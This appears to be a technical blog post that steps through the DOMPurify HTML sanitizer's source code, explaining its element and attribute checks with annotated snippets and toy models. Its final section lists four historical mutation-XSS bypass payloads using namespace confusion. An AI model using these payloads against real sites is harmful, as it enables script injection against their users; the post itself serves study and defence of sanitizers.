A Short Exploration of the DOMPurify Source Code

Deen's blog

2021-05-19

0x00 Introduction to DOMPurify

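DOMPurify is an open-source, DOM-based, fast XSS sanitizer. It takes HTML as input, parses it into a DOM, walks the resulting nodes, sanitizes them, and outputs safe HTML.
GitHub: https://github.com/cure53/DOMPurify
Latest version at the time of writing: 2.2.8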

0x01 Common Usage

const createDOMPurify = require('dompurify');
const { JSDOM } = require('jsdom');

const window = new JSDOM('').window;
const DOMPurify = createDOMPurify(window);

const clean = DOMPurify.sanitize("<img/src=x onerror=alert(1)>");

After this code runs, clean holds <img src="x">

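DOMPurify.sanitize is the most common entry point. It also accepts a second argument, a configuration object; see the official documentation for the available options.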

0x02 Debugging Setup

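The DOMPurify source uses ES6 syntax, and I wanted to debug it with node from WebStorm, so some setup is needed first (for reference, see the article "Node.js 中使用 ES6 中的 import / export 的方法大全", a roundup of ways to use ES6 import / export in Node.js):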

Download all of the code under https://github.com/cure53/DOMPurify/tree/main/src and change the file extensions to .mjs.

My own main.js looks like this:

import createDOMPurify from "./DOMPurify-main/src/purify.mjs";
import JSDOM from 'jsdom';
const window = new JSDOM.JSDOM('').window;
const DOMPurify = createDOMPurify(window);
const html = "<img/src=x onerror=alert(1)>";
console.log(DOMPurify.sanitize(html));

Start node with the --experimental-modules flag.


0x03 Stepping Through sanitize

Main code

Let's step through the main part of the sanitize function:

const nodeIterator = _createIterator(IN_PLACE ? dirty : body);

/* Now start iterating over the created document */
while ((currentNode = nodeIterator.nextNode())) {
  /* Fix IE's strange behavior with manipulated textNodes #89 */
  if (currentNode.nodeType === 3 && currentNode === oldNode) {
    continue;
  }

  /* Sanitize tags and elements */
  if (_sanitizeElements(currentNode)) {
    continue;
  }

  /* Shadow DOM detected, sanitize it */
  if (currentNode.content instanceof DocumentFragment) {
    _sanitizeShadowDOM(currentNode.content);
  }

  /* Check attributes, sanitize if necessary */
  _sanitizeAttributes(currentNode);

  oldNode = currentNode;
}

oldNode = null;

dirty is the object to be sanitized, i.e. the data we passed in.

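First, _createIterator together with while ((currentNode = nodeIterator.nextNode())) walks the parsed input node by node. For example, <img src=x><svg src=x> is visited as two elements, img and svg (text nodes are visited as well, hence the nodeType === 3 check).
Inside the loop body, currentNode is therefore the img element first and then the svg element.
Two sanitizing steps run on each node: _sanitizeElements and _sanitizeAttributes.
_sanitizeElements, as the name suggests, sanitizes the tag itself.
_sanitizeAttributes sanitizes the tag's attributes.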
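
To make the control flow concrete, here is a toy model of that loop in plain JavaScript. It is not DOMPurify's code: the tree is built from plain objects rather than DOM nodes, walk stands in for the NodeIterator, the Shadow DOM step is left out, and makeNode, sanitizeTree and the two tiny allow-lists are names made up for this sketch.

```javascript
// Toy model of the sanitize loop. Every name here is hypothetical and only
// mirrors the shape of the real code; nothing is taken from DOMPurify itself.
const TOY_ALLOWED_TAGS = { div: true, img: true };
const TOY_ALLOWED_ATTR = { src: true };

function makeNode(tag, attrs = {}, children = []) {
  const node = { tag, attrs, children, parent: null };
  children.forEach((child) => { child.parent = node; });
  return node;
}

// Pre-order walk, standing in for nodeIterator.nextNode().
function* walk(node) {
  for (const child of [...node.children]) {
    yield child;
    if (child.parent === node) yield* walk(child); // skip removed subtrees
  }
}

// Returns true when the node was removed, like _sanitizeElements.
function sanitizeElement(node) {
  if (TOY_ALLOWED_TAGS[node.tag]) return false;
  node.parent.children = node.parent.children.filter((c) => c !== node);
  node.parent = null;
  return true;
}

function sanitizeAttributes(node) {
  for (const name of Object.keys(node.attrs)) {
    if (!TOY_ALLOWED_ATTR[name]) delete node.attrs[name];
  }
}

function sanitizeTree(body) {
  for (const currentNode of walk(body)) {
    if (sanitizeElement(currentNode)) continue; // removed, nothing left to check
    sanitizeAttributes(currentNode);
  }
  return body;
}

const body = makeNode('body', {}, [
  makeNode('img', { src: 'x', onerror: 'alert(1)' }),
  makeNode('script'),
]);
sanitizeTree(body);
console.log(JSON.stringify(body.children.map((n) => [n.tag, n.attrs])));
// prints [["img",{"src":"x"}]]
```

The point to take away is the early continue: once the element step has removed a node, the attribute step never sees it.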

The _sanitizeElements function

/* Check if tagname contains Unicode */
if (stringMatch(currentNode.nodeName, /[\u0080-\uFFFF]/)) {
  _forceRemove(currentNode);
  return true;
}

/* Now let's check the element's type and name */
const tagName = stringToLowerCase(currentNode.nodeName);

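Elements whose tag name contains a non-ASCII character (anything in the range U+0080 to U+FFFF) are removed outright. The tag name is then normalized to lowercase.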
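
A minimal sketch of those two steps on a bare string, assuming nothing beyond the regular expression shown in the snippet. normalizeTagName is a hypothetical helper for illustration, not something DOMPurify exports; returning null here stands for "remove the element".

```javascript
// Hypothetical helper mirroring the two steps above; not part of DOMPurify.
function normalizeTagName(nodeName) {
  // Any code unit in U+0080..U+FFFF means "remove this element".
  if (/[\u0080-\uFFFF]/.test(nodeName)) return null;
  return nodeName.toLowerCase();
}

console.log(normalizeTagName('IMG'));           // prints img
console.log(normalizeTagName('scr\u0131pt'));   // prints null (dotless i, U+0131)
```

Rejecting such names before lowercasing sidesteps any surprises from case mapping of non-ASCII letters.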

if (!ALLOWED_TAGS[tagName] || FORBID_TAGS[tagName]) {
  /* Keep content except for bad-listed elements */
  if (KEEP_CONTENT && !FORBID_CONTENTS[tagName]) {
    const parentNode = getParentNode(currentNode) || currentNode.parentNode;
    const childNodes = getChildNodes(currentNode) || currentNode.childNodes;

    if (childNodes && parentNode) {
      const childCount = childNodes.length;

      for (let i = childCount - 1; i >= 0; --i) {
        parentNode.insertBefore(
          cloneNode(childNodes[i], true),
          getNextSibling(currentNode)
        );
      }
    }
  }

  _forceRemove(currentNode);
  return true;
}

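Tags that are not in the allow-list, or that are explicitly forbidden, are removed. With KEEP_CONTENT enabled, their children are first moved up to the parent, unless the tag is listed in FORBID_CONTENTS. The allow-list lives in tags.js.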

export const html = freeze([
  'a',
  'abbr',
  'acronym',
  'address',
  'area',
  'article',
  'aside',
  'audio',
  'b',
  ......
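
The check ALLOWED_TAGS[tagName] is a property lookup, so an array like the one above has to be turned into a lookup object first (as far as I can tell the source does this with a helper called addToSet). The sketch below models that conversion and the KEEP_CONTENT branch on plain objects. toLookup, filterSiblings and the three-entry list are made up for the illustration.

```javascript
// Hypothetical stand-in for turning a frozen tag array into a lookup object.
function toLookup(names) {
  const set = Object.create(null); // no inherited keys such as "constructor"
  for (const name of names) set[name.toLowerCase()] = true;
  return set;
}

const allowedTags = toLookup(Object.freeze(['a', 'b', 'img']));

// Model of the KEEP_CONTENT branch on a list of siblings: an allowed node
// stays, a disallowed node is replaced by its (re-checked) children.
function filterSiblings(siblings, keepContent) {
  return siblings.flatMap((node) => {
    if (allowedTags[node.tag]) return [node];
    return keepContent ? filterSiblings(node.children, keepContent) : [];
  });
}

const siblings = [
  { tag: 'b', children: [] },
  { tag: 'blink', children: [{ tag: 'a', children: [] }] },
];
console.log(filterSiblings(siblings, true).map((n) => n.tag));  // prints [ 'b', 'a' ]
console.log(filterSiblings(siblings, false).map((n) => n.tag)); // prints [ 'b' ]
```

In the real code the hoisted children are inserted after the removed element, so the iterator reaches them later and checks them like any other node; the recursion in filterSiblings plays that role here.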

/* Check whether element has a valid namespace */
if (currentNode instanceof Element && !_checkValidNamespace(currentNode)) {
  _forceRemove(currentNode);
  return true;
}

if (
  (tagName === 'noscript' || tagName === 'noembed') &&
  regExpTest(/<\/no(script|embed)/i, currentNode.innerHTML)
) {
  _forceRemove(currentNode);
  return true;
}

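This validates the element's namespace, an area that has been bypassed in the past. Below it is a check on noscript (and noembed) elements. With the default allow-list it looks somewhat redundant, because those tags are not allowed and were already removed above; it would only come into play when a configuration allows them, for example through ADD_TAGS.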
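
To see what the noscript / noembed check reacts to, the condition can be tried on plain strings. The wrapper name hasSuspiciousNoContent and the sample inputs are hypothetical; only the regular expression comes from the snippet above.

```javascript
// Hypothetical wrapper around the regular expression from the snippet above.
function hasSuspiciousNoContent(tagName, innerHTML) {
  return (
    (tagName === 'noscript' || tagName === 'noembed') &&
    /<\/no(script|embed)/i.test(innerHTML)
  );
}

// A closing tag hidden inside an attribute value is flagged.
console.log(hasSuspiciousNoContent('noscript', '<p title="</noscript><img src onerror=alert(1)>">')); // prints true
console.log(hasSuspiciousNoContent('noscript', '<p>plain fallback</p>')); // prints false
console.log(hasSuspiciousNoContent('div', '</noscript>')); // prints false
```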

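The _sanitizeAttributes function

First, every attribute is removed from currentNode, whatever it is (unless a hook set forceKeepAttr, in which case the attribute is left untouched).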

if (hookEvent.forceKeepAttr) {
  continue;
}

/* Remove attribute */
_removeAttribute(name, currentNode);

/* Did the hooks approve of the attribute? */
if (!hookEvent.keepAttr) {
  continue;
}

Then _isValidAttribute decides, based on the tag name, the attribute name and the attribute value, whether the attribute is acceptable.

const lcTag = currentNode.nodeName.toLowerCase();
if (!_isValidAttribute(lcTag, lcName, value)) {
  continue;
}

If the attribute is valid, setAttribute is called to put it back.
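
The remove-first, restore-if-valid pattern can be sketched with a Map standing in for an element's attributes. sanitizeAttrs and the isValid callback are hypothetical; isValid plays the role of _isValidAttribute, and hooks are left out.

```javascript
// Toy model: attributes live in a Map; isValid is a hypothetical stand-in
// for _isValidAttribute.
function sanitizeAttrs(attrs, isValid) {
  // Snapshot the entries first, because the Map is modified inside the loop.
  for (const [name, value] of [...attrs]) {
    attrs.delete(name);                        // 1. always remove
    const lcName = name.toLowerCase();
    if (!isValid(lcName, value)) continue;     // 2. invalid: stays removed
    attrs.set(name, value);                    // 3. valid: put it back
  }
  return attrs;
}

const attrs = new Map([['src', 'x'], ['onerror', 'alert(1)']]);
sanitizeAttrs(attrs, (lcName) => lcName === 'src');
console.log([...attrs]); // prints [ [ 'src', 'x' ] ]
```

Removing first means an attribute only survives if every later check explicitly lets it through; any early continue leaves it gone.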

The key piece is the _isValidAttribute function. You can step through it in the debugger and try to bypass it... nice try...

if (ALLOW_DATA_ATTR && regExpTest(DATA_ATTR, lcName)) {
  // This attribute is safe
} else if (ALLOW_ARIA_ATTR && regExpTest(ARIA_ATTR, lcName)) {
  // This attribute is safe
  /* Otherwise, check the name is permitted */
} else if (!ALLOWED_ATTR[lcName] || FORBID_ATTR[lcName]) {
  return false;

  /* Check value is safe. First, is attr inert? If so, is safe */
} else if (URI_SAFE_ATTRIBUTES[lcName]) {
  // This attribute is safe
  /* Check no script, data or unknown possibly unsafe URI
    unless we know URI values are safe for that attribute */
} else if (
  regExpTest(IS_ALLOWED_URI, stringReplace(value, ATTR_WHITESPACE, ''))
) {
  // This attribute is safe
  /* Keep image data URIs alive if src/xlink:href is allowed */
  /* Further prevent gadget XSS for dynamically built script tags */
} else if (
  (lcName === 'src' || lcName === 'xlink:href' || lcName === 'href') &&
  lcTag !== 'script' &&
  stringIndexOf(value, 'data:') === 0 &&
  DATA_URI_TAGS[lcTag]
) {
  // This attribute is safe
  /* Allow unknown protocols: This provides support for links that
    are handled by protocol handlers which may be unknown ahead of
    time, e.g. fb:, spotify: */
} else if (
  ALLOW_UNKNOWN_PROTOCOLS &&
  !regExpTest(IS_SCRIPT_OR_DATA, stringReplace(value, ATTR_WHITESPACE, ''))
) {
  // This attribute is safe
  /* Check for binary attributes */
  // eslint-disable-next-line no-negated-condition
} else if (!value) {
  // Binary attributes are safe at this point
  /* Anything else, presume unsafe, do not add it back */
} else {
  return false;
}
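
The IS_ALLOWED_URI branch is easier to follow when tried on concrete values. The two patterns below are written from memory of DOMPurify's regexp.js for the 2.x line, so treat them as assumptions and compare them with the real file before relying on them. looksLikeAllowedUri is a hypothetical helper that covers only this one branch.

```javascript
// Approximations of two patterns from DOMPurify's regexp.js, written from
// memory; they are assumptions, not a verified copy of the source.
const ATTR_WHITESPACE = /[\u0000-\u0020\u00A0\u1680\u180E\u2000-\u2029\u205F\u3000]/g;
const IS_ALLOWED_URI =
  /^(?:(?:(?:f|ht)tps?|mailto|tel|callto|cid|xmpp):|[^a-z]|[a-z+.\-]+(?:[^a-z+.\-:]|$))/i;

// Hypothetical helper covering only the IS_ALLOWED_URI branch.
function looksLikeAllowedUri(value) {
  return IS_ALLOWED_URI.test(value.replace(ATTR_WHITESPACE, ''));
}

console.log(looksLikeAllowedUri('https://example.com/a.png')); // prints true
console.log(looksLikeAllowedUri('/relative/path'));            // prints true
console.log(looksLikeAllowedUri('javascript:alert(1)'));       // prints false
console.log(looksLikeAllowedUri('java\tscript:alert(1)'));     // prints false

// Without stripping whitespace first, the tab would let the value slip through.
console.log(IS_ALLOWED_URI.test('java\tscript:alert(1)'));     // prints true
```

The last line shows why the value is passed through stringReplace(value, ATTR_WHITESPACE, '') before the test. A data: value also fails this pattern, which is why image data URIs get their own branch further down.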

0x04 Historical Bypasses

These can be found in the pull requests and in the release changelogs, for example:
Namespace confusion bypass: https://github.com/cure53/DOMPurify/pull/495


payloads：

<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>
<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">
<math><mtext><table><mglyph><style><img src=1 onerror=alert(1)>">
<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(\'XSS\') src>">